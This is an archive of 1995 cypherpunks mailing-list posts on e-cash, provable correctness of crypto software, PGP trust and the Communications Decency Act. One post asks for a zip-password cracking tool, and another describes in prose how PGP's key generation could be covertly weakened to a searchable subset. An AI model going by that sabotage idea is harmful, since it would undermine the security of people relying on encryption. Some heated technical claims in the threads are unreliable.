gil@hr.house.gov,
dminge@hr.house.gov,
mn03@hr.house.gov,
vento@hr.house.gov, 
tellbill@hr.house.gov,
tocollin@hr.house.gov,
oberstar@hr.house.gov,
goldsmit@iquest.net
talentmo@hr.house.gov,
demldr@hr.house.gov,
bemerson@hr.house.gov,
bthompson@hr.house.gov,
funnc02@hr.house.gov,
thechief@hr.house.gov,
mail2nc5@hr.house.gov,
crose@hr.house.gov,
myrick@hr.house.gov,
chtaylor@hr.house.gov,
melmail@hr.house.gov,
epomeroy@hr.house.gov,
zeliff@hr.house.gov,
franksnj@hr.house.gov, 
dzimmer@hr.house.gov,
mpforbes@hr.house.gov,
lazio@hr.house.gov,
tmanton@hr.house.gov,
molinari@hr.house.gov,
rangel@hr.house.gov,
jserrano@hr.house.gov,
engeline@hr.house.gov,
boehlert@hr.house.gov,
bpaxon@hr.house.gov,
portmail@hr.house.gov,
hokemail@hr.house.gov,
istook@hr.house.gov,
furseor1@hr.house.gov,
pdefazio@hr.house.gov,
murtha@hr.house.gov,
jonfox@hr.house.gov,
mchale@hr.house.gov,
pa16@hr.house.gov,
jspratt@hr.house.gov,
cwilson@hr.house.gov,
samtx03@hr.house.gov,
barton06@hr.house.gov,
doggett@hr.house.gov,
frost@hr.house.gov,
ggreen@hr.house.gov,
enidutah@hr.house.gov,
ortonut3@hr.house.gov,
opickett@hr.house.gov,
talk2bob@hr.house.gov,
ninthnet@hr.house.gov,
bsanders@igc.apc.org,
repwhite@hr.house.gov,
asklinda@hr.house.gov,
dunnwa08@hr.house.gov,
rtate@hr.house.gov,
mneumann@hr.house.gov,
badger02@hr.house.gov,
roth08@hr.house.gov,
commerce@hr.house.gov,
slabmgnt@hr.house.gov,
resource@hr.house.gov,
housesst@hr.house.gov,
smbizcom@hr.house.gov
============================================
Dr. Linda D. Thompson              
American Justice Federation                                               
3850 S. Emerson Avenue, Suite E,  Indianapolis, IN 46203
Telephone: (317) 780-5203      AEN News BBS: (317) 780-5211
Fax: (317) 780-5209                 Orders (Visa/MC) 1-800-749-9939    
Internet: lindat@iquest.net

*******************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Tue, 1 Aug 95 21:14:43 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <Pine.SUN.3.91.950802000010.21825D-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young:
| A Foxhole-atheist swears Pat Robertson said last night that his
| new book warns of a "digital cash society" and massive
| theft by cyber-criminals. Did any believer hear this, or 
| know if this is what he prognosticates for e-cash bedevilment?

----- BEGIN EXCERPT -----
The 700 Club, March 8, 1995, 10:00 -- 11:30 AM

[ ... ]

PAT ROBERTSON: OK. Well, ladies and gentlemen, something a little bit 
more serious. You know, the Bible talks about a day when people won't be 
able to buy or sell except having a mark; a mark of what is called the 
beast. It's one of those things in Relevation that keeps coming up. Well, 
as technology increases, we see a little bit -- a little bit more. Now 
we've got digital cash that may on the way to your wallet, a card you can 
use for any kind of purchase, from health care to road tolls to 
pay-per-view TV. But are there hidden security dangers in this 
computerized wonder card? We've got a special report on this program. You 
don't want to miss it.

[ ... ]

ROBERTSON: Now that man [David Chaum!] is Jewish. I don't know whether 
he's speaking out of Relevations or not, but that is the scenario set 
forth ... in Relevation, that the -- the -- the cards are too -- too 
valuable to be lost, which means that -- that there has to be some other 
identification. And we just were speaking, prior to the program, about 
the possibility of, indeed, a tattoo that would carry -- just tiny little 
dots would carry -- all the information that is needed could be put on 
somebody's hand or wherever. It's -- it's that close, really. ... We've 
got a few years to go, but I -- I -- I -- I'm just -- and -- and the -- 
the -- the justification for all this is, `Well, we can't have people 
dealing drugs.' So let's -- in order to cut the drug dealers, let's take 
away the freedom and privacy of every other human being on the face of 
the earth, and that is a frightening prospect.

[ ... ]

----- END EXCERPT ----

There's more, like an interview with David Chaum and Dave Banisar [EPIC], 
but I've got raw calluses on my hands, so I'm not doing any more typing 
tonight. ;-)

PS to JYA: Communique top secret postal address / telephone facsimile
machine access codes for possible transmittance of relevant sections for
scanning and automatic distribution to the CP list via usual methods? 
Remember to use HyperMIME backchannel DC-net OTP public key MOST SECRET
secret-shared subliminal-signature encoding methods to prevent
intellectual property gestapo from homing in on location of Rebel base,
no? ;-)
--
Michael Handler      | Cypherpunks: Civil Liberty through Complex Mathematics
handler@sub-rosa.com | 
grendel@netaxs.com   | ISO: Midrange good quality violincello, new or used,
Philadelphia, PA     |      full size, with bow and case, in PA/NY/NJ/DE/MD.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 2 Aug 95 00:36:44 PDT
To: John Young <cypherpunks@toad.com
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <ac4478ee14021004c8be@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:31 AM 8/2/95, John Young wrote:
>   A Foxhole-atheist swears Pat Robertson said last night that
>his
>   new book warns of a "digital cash society" and massive
>   theft by cyber-criminals. Did any believer hear this, or
>know if
>   this is what he prognosticates for e-cash bedevilment?

I didn't see this, but even if I did it's not likely the subtleties of
digital cash societies would be explored.

There is the "digital cash society" we fear as an Orwellian surveillance
society, with all transactions recorded. This is perhaps the future
Robertson fears.

There is the "digital cash society" based on Chaumian schemes and
untraceability, similar to a "hard cash" society without proofs of identity
at every stage, and I suspect Robertson would find much to like about this.

(There are also the implications which Robertson might recoil at, too. :-})

So, hearing that "Pat Robertson is warning against a digital cash society"
is not too worrisome to me. I suspect he means the stuff about Big Brother
tracking us and the Number of the Beast, and so on.

Don't forget he came out strongly against Clipper, early on.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Tue, 1 Aug 95 22:44:30 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Provably Correct Crypto?
In-Reply-To: <9508011911.AA11465@all.net>
Message-ID: <Pine.3.89.9508020027.D23934-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 1 Aug 1995, Dr. Frederick B. Cohen was alleged to have blathered:

> Tim May mused:

> > Anything that "reaches out" to external libraries or utilities would then
> > have the vulnerabilities of _those_ libraries and utilities, which may or
> > may not be provably correct themselves. (And the issue of any PRNG being
> > probably correct or not is of course an interesting, and deep, question.)
> > 
> > I do think the issues of modular design and provable correctness--or
> > approximations to it--are interesting ones.
> 
> I think that this issue can generally be addressed by a divide and
> conquer strategy.  Prove that the called routines are correct and
> confined under all possible parameters, do the same for the calling
> routines, do the same for the interaction between them, and I think you
> have it.  This is pretty easy for one or two routines, but when you take
> the OS into account, the C compiler into account, the program itself
> into account, and the external environment into account, you run into
> some serious limitations.  For example, you may (in some cases) have to
> show that under all possible sequences of interrupt timings and stack
> conditions, the system operates correctly (which almost none currently
> do).  Unless you design with this sort of thing in mind, it's very hard
> to demonstrate these properties even for limited subproblems. 
> 

After all your griping over PGP, you spout this?  Have you ever heard of 
Godel's theorem?  I have a phrase for people who peddle their mark of 
approval that a given large program will work: "Snake oil salesman".  In 
the messages which you have scrawled between this and the last on my 
system when I caught up this evening, you have demonstrated the 
fraudulent nature of your business by first claiming that certain 
propositions were "demonstrated", then stating that a graduate student 
was working on "proving" them.

I repeat: Snake Oil Salesman

<PLONK>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Tue, 1 Aug 95 22:46:16 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <Pine.SUN.3.91.950801220141.3608B-100000@rwd.goucher.edu>
Message-ID: <Pine.3.89.9508020058.E23934-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


I believe that Pat Robertson is not aware of the privacy-enhancing 
capabilities of e-cash.  In a probabilistic sense, he may well be right.

Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 1 Aug 95 23:09:46 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: a hole in PGP{n@3
In-Reply-To: <Pine.SUN.3.91.950801061213.9088A-100000@panix.com>
Message-ID: <Pine.D-G.3.91.950802020333.25124A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995, Duncan Frissell wrote:

> 
> 
> On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:
> 
> > Why (specifically) do you think so? Because you claim it? Because the
> > MIT maintainer claims it? You say MIT is not associated with the NSA,
> > but they have historically been funded by the NSA and other federal
> > agencies for work on information security.  Do you really think that the
> 
> Of course MIT was in the NSA's pocket back in 1978 when they mailed me 
> and 3,000 other people a copy of "A Proposal for a Public Key Encryption 
> System" and started this whole Public Key-Private Key thing.  It was all 
> part of a plot.  If they hadn't done that we might all be using stronger 
> systems today.

You forgot the NSA's most recent overt act in the PGP conspiracy:  it 
gets PGP declared a munition, harassing PZ, gets lots of bad press, etc., 
all in order to make Cypherpunks believe that there is no back door, when 
there really  is!

Shhhhhhhhh. Don't let on that you know.  Just go back to Rot-13 encoding.


> DCF


EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 2 Aug 95 01:36:55 PDT
To: nzook@bga.com (Nathan Zook)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <Pine.3.89.9508020027.D23934-0100000@maria.bga.com>
Message-ID: <9508020830.AA25888@all.net>
MIME-Version: 1.0
Content-Type: text


> > I think that this issue can generally be addressed by a divide and
> > conquer strategy.  Prove that the called routines are correct and
> > confined under all possible parameters, do the same for the calling
> > routines, do the same for the interaction between them, and I think you
> > have it.  This is pretty easy for one or two routines, but when you take
> > the OS into account, the C compiler into account, the program itself
> > into account, and the external environment into account, you run into
> > some serious limitations.  For example, you may (in some cases) have to
> > show that under all possible sequences of interrupt timings and stack
> > conditions, the system operates correctly (which almost none currently
> > do).  Unless you design with this sort of thing in mind, it's very hard
> > to demonstrate these properties even for limited subproblems. 
> > 
> 
> After all your griping over PGP, you spout this?  Have you ever heard of 
> Godel's theorem?

I think so.  From my understanding, it basically says that, in the
general system, you can write a legitimate expression that expresses its
own illegitimacy, or in other words that the general system is
incomplete "...in the sense that it fails to provide a proof for every
formula which is true under the interpretation..." (quoted from
"Introduction to Metamathematics" by S.C.  Kleene 1952,...,1980)

But I think you misinterpret this.  This does not mean that no program
can be proven to meet any properties.  It means that, among other
things, there are an infinite number of infinite expressions that cannot
be proven, but it does not mean that a finite expression (e.g., a
typical modern program) cannot be proven to meet all sorts of
properties.

In particular, for certain classes of programs, proofs about the flow of
information are not exceedingly complex to establish.  In general (as
was proven in the early 1980s), tracking information flow in a program
is NP-complete, however, in a program designed to limit information flow
this can be very straight forward (in fact I think it may be linear time
and space).  By proving that information doesn't flow from place to
place, we can essentially prove that information in one place does not
affect information in another place (by information thoeory), and
therefore greatly reduce the complexity of demonstrating various things
of particular interest to information security - to wit - that item A
doesn't corrupt item B, and that information in item A is not leaked to
item B.

>  I have a phrase for people who peddle their mark of 
> approval that a given large program will work: "Snake oil salesman".

In the case of the http daemon, it is a relatively small program of less
than 80 lines designed to be secure in various ways.  In the case of PGP
it is a relatively larger program that it not designed to be secure.

>  In 
> the messages which you have scrawled between this and the last on my 
> system when I caught up this evening, you have demonstrated the 
> fraudulent nature of your business by first claiming that certain 
> propositions were "demonstrated", then stating that a graduate student 
> was working on "proving" them.

How is it fraudulent to accurately state the facts?

> I repeat: Snake Oil Salesman

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 2 Aug 95 01:38:20 PDT
To: cypherpunks@toad.com
Subject: Re: Provably Correct Crypto?
Message-ID: <9508020832.AA25989@all.net>
MIME-Version: 1.0
Content-Type: text


> I stipulated I didn't want any such garbage, I specifically said
> english summaries are not acceptable and you bombard me with them.
> Yet you wont accept others opinion of PGP's security, which verbal or
> other wise, can only be an abstract summary.

The difference between my response to your question and your responses
to my questions is that I tried to answer your questions.

> > > You state that crypto should be poved correct and suggest a technique
> > > otherwise known as formal specification.  I agree, pgp should have
> > > been written in Z-specs.  If you take a course in formal specification
> > > you will soon see the intractability of the technique wrt large
> > > systems.
> > 
> > I didn't say that.  Perhaps you should review what I said before
> > characterizing it.
> 
> piffle! Your words:
> 	"I think that this issue can generally be addressed by a divide
> 	and conquer strategy.  Prove that the called routines are
> 	correct and confined under all possible parameters, do the
> 	same for the calling routines, do the same for the interaction
> 	between them, and I think you have it."

I don't see wher I said anything about formal specification here or Z-specs.
It's true that proof of correctness for large systems is a hard problem, and
that is one of the reasons that the secure http daemon is designed to be small.
However, the same has not been shown (as far as I am aware) for many of the
other properties that may be interesting from a security standpoint.

> This sounds like performing a formal analsis to me.  And you didn't
> address the intractability anyway.

Problems worthy of attack, prove their worth by fighting back - Alan Perlis

> > I have shown (not yet proven) certain things.  A graduate student is now
> > working on trying to prove the various properties I believe to be of
> > interest in an automatic theorum prover he is working on.
> 
> The work in automatic theorum proving is ongoing and not limited to
> your grad student or your work.

I never said it was and he is not my grad student.  He is a grad student
who made some comments on the daemons and decided he would be interested
in seeing if some of these properties could be proven.

> > I believe that these things are worth showing (and proving), but you
> > may certainly feel free to disagree with these contentions.
> 
> I said showing by english isn't good enough, proving would be
> fantastic.  I don't believe these issues reside solely with pgp and as
> such you should question computability as a whole before using
> "incomplete specification" in accusing one system to be flawed.

And I told you that we are in the process of, but not finished with, doing
just that.  I never said that any such problems reside solely in PGP.

> > > If you want prople on this list to repeat after you "I cannot be
> > > certain there is no compromising bugs or backdoors in X" Then I will
> > > go out on a limb and say everyone here will agree if system X is
> > > sufficiently large.
> > 
> > I don't believe I ever asked anyone on this list to repeat anything. 
> > All I did was ask questions and respond to responses to my questions.
> 
> Your tiresome repetitive question was "Why do you belive X is secure"
> I herby answer exactly as above "I cannot be certain there is no
> compromising bugs or backdoors in X"

If you are tired of hearing my responses to your comments, there is an
obvious solution.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an264373@anon.penet.fi (Sauroth)
Date: Tue, 1 Aug 95 22:52:36 PDT
To: cypherpunks@toad.com
Subject: pkzip cracking
Message-ID: <9508020518.AA02633@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have a utility to crack password encrypted/protected zip 
files?  Or an address to download one?  All replies / flames / 
pointers appreciated.

Sauroth

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Tue, 1 Aug 95 23:14:15 PDT
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: A hole in PGP
Message-ID: <301f0cc0.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If I were going to create a hole in PGP, I would create a "bug" in
PGP's key generation process which would limit the primes PGP
chooses to a relatively small subset. Then when I wanted to break,
I would factor by searching this small subset.

I could also try to put a bug in the code that chooses a Random
Idea key, making it choose from a small subset, that again could be
searched.

To put a bug in the idea portion of PGP would be difficult because
people can check if PGP can intemperate with other implementations
of IDEA.

- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMB8adfBUQYbUhJh5AQEx3QP9Har9kb9731F/Nzl0p9kMDEhN6YaSmU4D
HZ+Xhcwq8fA1EBZOzszmjG5gI2JZvciaQpA6vV+ZraKCoJljXB0Ud0AuRwJnxbSq
K4gvmev2Hgi3soE1HWsF/ODmiO4be+haxfDrTYDNjVDP56XL1LH2Lxysx1cqrVqt
DRZ4l0480PE=
=eLP9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 2 Aug 95 06:39:52 PDT
To: "David R. Conrad" <ab411@detroit.freenet.org>
Subject: Re: There's a hole in your crypto...
In-Reply-To: <199508021251.IAA08192@detroit.freenet.org>
Message-ID: <Pine.3.89.9508020831.B3863-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 2 Aug 1995, David R. Conrad wrote:

> 
> 
> Phil Fraering writes:
> >Why are the arguments on either side so emotional?
> 
> I'm rather hesitant to jump into this thread, but I think that one
> reason is that Fred's concerns have been misunderstood a bit.  (If
> I'm wrong, I'm sure he'll correct me.)
> 
> It seems that there are many people who are ready to leap to the
> defense of the honor of the programmers behind PGP, when they feel
> said honor is being impugned.
> 
> I get the impression (as much from what I know of his background as
> from what he's said) that Fred is at least as concerned about PGP
> being a correct implementation of the various algorithms it involves
> as he is about back doors inserted by nefarious individuals.
> 
> As I understand it, it is impossible to demonstrate the correctness of
> any program the size of PGP.  And it would also not be possible to
> validate the compiler or the operating system.  One thing I'm not sure
> of, though, is this: Would it be possible to verify a much smaller
> program, say, the RSA-in-3-lines-of-Perl?  (Of course, you still would
> be left trying to verify the Perl interpreter, and the OS again.)
> 
> And is there any way to build trusted system out of small, verifiable
> pieces?  Since the way they're connected could also be questioned, I
> suspect that when you put enough of them together it's just as bad as
> the case of a single, monolithic program.  But this isn't my area, so
> I don't know.

No.  This was essentially proved during the first third of this century.

But even if the program itself works, you have to check the OS, the 
motherboard & the processor.  Did I say processor?  Yes, I did.  Anyone 
running on an 80586?

Nathan


> Would it be possible to formally verify at least some parts of a large
> program like PGP?  And would that add to the trustworthiness of the
> overall program?  (Keeping in mind Fred's earlier remark about a
> seemingly-unrelated portion of the code overwriting the key.)
> 
> --
> David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
> Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
> Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
> No, his mind is not for rent to any god or government.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 2 Aug 95 05:52:06 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <199508021251.IAA08192@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Phil Fraering writes:
>Why are the arguments on either side so emotional?

I'm rather hesitant to jump into this thread, but I think that one
reason is that Fred's concerns have been misunderstood a bit.  (If
I'm wrong, I'm sure he'll correct me.)

It seems that there are many people who are ready to leap to the
defense of the honor of the programmers behind PGP, when they feel
said honor is being impugned.

I get the impression (as much from what I know of his background as
from what he's said) that Fred is at least as concerned about PGP
being a correct implementation of the various algorithms it involves
as he is about back doors inserted by nefarious individuals.

As I understand it, it is impossible to demonstrate the correctness of
any program the size of PGP.  And it would also not be possible to
validate the compiler or the operating system.  One thing I'm not sure
of, though, is this: Would it be possible to verify a much smaller
program, say, the RSA-in-3-lines-of-Perl?  (Of course, you still would
be left trying to verify the Perl interpreter, and the OS again.)

And is there any way to build trusted system out of small, verifiable
pieces?  Since the way they're connected could also be questioned, I
suspect that when you put enough of them together it's just as bad as
the case of a single, monolithic program.  But this isn't my area, so
I don't know.

Would it be possible to formally verify at least some parts of a large
program like PGP?  And would that add to the trustworthiness of the
overall program?  (Keeping in mind Fred's earlier remark about a
seemingly-unrelated portion of the code overwriting the key.)

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 2 Aug 95 06:53:05 PDT
To: cypherpunks@toad.com
Subject: NYET--attempted formal specs (again)
Message-ID: <Pine.3.89.9508020848.A4868-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


I hope I'm not becoming Detweileresqe about this, but I've had some 
requests for these.  Since not even I was satisfied with my original 
notation, I thought I'ld try again...

(donning gear)

-----BEGIN PGP SIGNED MESSAGE-----
 
Copyright 1995, Nathan Zook.  All rights reserved.
 
NYET-- Non-Youths Exhibit Temperance.
 
This is a rising, legitamate concern among parents that their children
have all-to-easy access to porn on the internet.  Last year, there
were numerous proposals for various voluntary self-rating systems.
AOL and Prodigy heavily censor their systems in various ways.  This
year, Senator Exon advanced his own proposal.  Of course, this occured
just about the time that SurfWatch came out.
 
But none of these proposals can ultimately succeed.  Here I restate my
NYET proposal from last year for your consideration.  The system is of
necessity ISP-based.  Home-based systems are subject to attacks at
home.  Since many (most?) children are better with computers than
their parents, these attacks can be expected to succeed.
 
Any ISP-based system requires that the ISP determine which customers
are not of majority age and who is legally responsible for them.
There are technical solutions to this problem which are part of the
basis to the proposal.
 
The elements of NYET are as follows: the ISP, monitoring software, the
parent/guardian of the minor, and one or more ratings services.
 
A NYET-ISP does not grant access priveleges to minors without prior
contact with the (generically) parent of the minor.  This contact
includes explaining and helping configure the NYET software in
accordance with the parent's wishes.
 
The NYET-software runs as superuser on the ISP's machine.  All minor
accounts have a corresponding configuration file sitting in their
account owner's parent's directory, which is locked with read/write by
owner only flags.  The correspondence between minor and parent
accounts sits in a file owned by root and similiarly locked.
 
The parent sets the configuration file to permit and deny access to
various parts of the net.  Since it is unreasonable for the parent to
personally "rate" the net, it is expected that various organizations
will form ratings services.  The parent could then select various
combinations of ratings criteria from these agencies as default.  It
is expected that the services would charge for their information.  It
is likely that these charges could be added to the monthly bill that
the parent receives from the ISP.
 
And the role of government?  Right now--none other than to encourage
parental involvement.  Any attempt to force this, or almost any other,
type of restriction by legislative "I say so" (fiat in Latin) will
meet with fatal opposition.  Until the legislature understands the
net, the combined efforts of the millions who use the net will swamp
any efforts to control it.
 
Speaking of government, school internet access is the bane of any
attempt by parents to control the access that their kids have to the
net.  Anyone seeking to limit children's access should look carefully
at this experimentation.
 
I post this proposal because I believe it to be one of the few stable
attractors in this problem.  I believe that Prodigy and SurfWatch
amount to first iterations, and that the market will push them towards
NYET.  When it does so move, and a majority of ISPs provide or nearly
provide NYET service, and ONLY then, the government might mandate the
NYET standard.  As a somewhat earlier measure, the government could
offer to hold harmless ISPs that adhere to these standards--but only
when the market has already handled the technical hurdles.
 
I feel it necessary to reiterate the importance of the government
waiting for a market solution to this problem.  By its design, the net
appeals to libertarians and anarchists.  For many years, it has been
accessible almost exclusively by people demographically predisposed to
a libertarian or anarchist world view.  The net.gods, when angered,
can produce no end of michief.  And since they designed the system,
they won't be stoppable.  
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQCVAwUBMB73X34gWvtXVTwZAQFKsAP9E/NOfKrt7WwcvNdMlWzg8jneyVa19hL+
9Ot7Ir4SigZJDDQ7hjxS2elJourCZpFWpBXFdKMbTGqTXMtmELZJu5qYidXDmV1i
BAWHYI0RW2E6MszGSgAh1MDfUpY7/RO89CjsuP8M3aGVF44FOWpIoTRZnNhXRO9q
xnA2tErpz+A=
=NpaG
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@izanami.sbi.com>
Date: Tue, 1 Aug 95 17:38:03 PDT
To: cypherpunks@toad.com
Subject: who cypherpunks
Message-ID: <Pine.SOL.3.91.950802093715.3396D-100000@izanami>
MIME-Version: 1.0
Content-Type: text/plain



... oops. sorry folks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rhoz@sna.com (Rhonda Halushka) (by way of carolann@censored.org (UnCensored Girls Anonymous))
Date: Wed, 2 Aug 95 07:49:55 PDT
To: cypherpunks@toad.com
Subject: Net Censorship bill
Message-ID: <199508021449.HAA17139@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


This showed up on The Spiderwoman list.
Seems accurate.
I endorse it as much as I endorse PGP.
I know most of you filter me out,
but for those that don't, THEN
please read this just for me.

For if this tiny amendment fails,
I do predict there won't be any
discussions of PGP by about 2005.
Simply because PGP will be outlawed by then.

The wheels of Washington grind slowly.
But once started almost never stop.

Love Always,

Carol Anne


---- Begin Forwarded Message
Return-Path: <owner-policy-posts@cdt.org>
Received: from cdt.org by ix4.ix.netcom.com (8.6.12/SMI-4.1/Netcom)
	id UAA27278; Tue, 1 Aug 1995 20:05:43 -0700
Received: (from majordom@localhost) by cdt.org (8.6.9/8.6.9) id 
QAA30972 for policy-posts-outgoing; Tue, 1 Aug 1995 16:37:15 -0400
Received: from [204.157.127.4] (whale.ctd.org [204.157.127.4]) by 
cdt.org (8.6.9/8.6.9) with SMTP id QAA30921 for <policy-posts>; Tue, 1 
Aug 1995 16:34:55 -0400
Message-Id: <199508012034.QAA30921@cdt.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 1 Aug 1995 17:43:34 -0400
To: policy-posts@cdt.org
From: editor@cdt.org
Subject: ALERT: House to Vote This Week on Net-Censorship Bills
Sender: owner-policy-posts@cdt.org
Precedence: bulk


HOUSE TO VOTE THIS WEEK
-----------------------

The House of Representatives will vote late Thursday or Early Friday
(Aug 3 or 4) on whether to add the Cox/Wyden Internet Freedom and 
Family
Empowerment Act as an amendment to the House Telecommunications Reform 
Bill (HR 1555). 

The Cox/Wyden amendment is a direct attack on the Exon/Coats 
Communications
Decency Act (CDA). House passage of the Cox/Wyden amendment is the last 

chance we have to defeat the Exon/Coats CDA. If the House fails to pass
Cox/Wyden, the Exon bill will likely become law.

We must act now to head off this possibility. Please take a moment to
contact your member of Congress and urge them to support the Cox/Wyden
legislation (described in the alert below). 

The attached alert is from a coalition organized by the Voters
Telecommunications Watch (VTW) which includes CDT, EFF, EPIC, and other 

online advocacy organizations.

This may be your last chance to make your voice heard on this critical 
issue, so please call before Friday August 4.

========================================================================

       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
        (SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)

        Update: -Latest News:
                        House vows to vote on Telecomm bill (which
                        includes the CDA) this week before recess!
                -What You Can Do Now

       ***   THIS IS YOUR LAST CHANCE TO MAKE A DIFFERENCE.      ***
       ***   THE HOUSE WILL VOTE ON THE COMMUNICATIONS DECENCY   ***
       ***   ACT THIS WEEK.  IF WE LOSE, IT WILL BECOME LAW.     ***

        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY 
ACT
                             July 30, 1995

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
                 REDISTRIBUTE ONLY UNTIL August 14, 1995
             REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS

      Distributed by the Voters Telecommunications Watch (vtw@vtw.org)
________________________________________________________________________

CONTENTS
        The Latest News
        What You Can Do Now
        What is Cox/Wyden? (HR1978)
        Chronology of the CDA
        For More Information
        List Of Participating Organizations
        List of the House of Representatives

________________________________________________________________________

THE LATEST NEWS

This week the House of Representatives will choose between
ANTI-FREE-MARKET PRO-CENSORSHIP LEGISLATION (the Exon/Coats
Communications Decency Act) and ANTI-CENSORSHIP PRO-PARENTAL-CONTROL
LEGISLATION (the Cox/Wyden Internet Freedom and Family Empowerment Act
- HR1978).

THIS IS YOUR LAST CHANCE AS A CITIZEN TO MAKE A DIFFERENCE.  IF WE LOSE
THIS VOTE, THE COMMUNICATIONS DECENCY ACT, ALREADY PASSED BY THE 
SENATE,
WILL BECOME US LAW.

The vision of a cyberspace ONLY FIT FOR CHILDREN will become reality.

The Communications Decency Act will be offered by supporters of
conservative pro-censorship groups THIS WEEK.  They will try and amend
HR1555 to include the Communications Decency Act and remove any other
net-friendly language such as the Leahy/Klink study.

________________________________________________________________________

WHAT YOU CAN DO NOW

1. THERE'S NO TIME FOR EMAIL OR SNAIL MAIL.  CALL OR FAX YOUR
   REPRESENTATIVE NOW.

2. Find your rep (instructions below) and urge them to oppose the
   Communications Decency Act and support parental control legislation
   (the Cox/Wyden "Internet Freedom and Family Empowerment Act" HR1978)

   Figure out who your Rep is; feel free to use the following sample.
   
** See Instructions Below On How To Obtain Your Rep's Phone and Fax 
Number **

   SAMPLE PHONE CALL
    (Y=You, S=Rep's Staffer)    
        <ring ring>
        S:Rep. Snark's office, may I help you?

        Y:Hi, As your constituent I'd like to urge Rep Snark to
          oppose Internet censorship legislation such as the Exon/Coats
          Communications Decency Act and support parental control bills
          such as the Cox/Wyden Internet Freedom and Family Empowerment
          Act - HR1978.

        S:Anything else?
        Y:Yes, where does Rep. Snark stand on this issue?
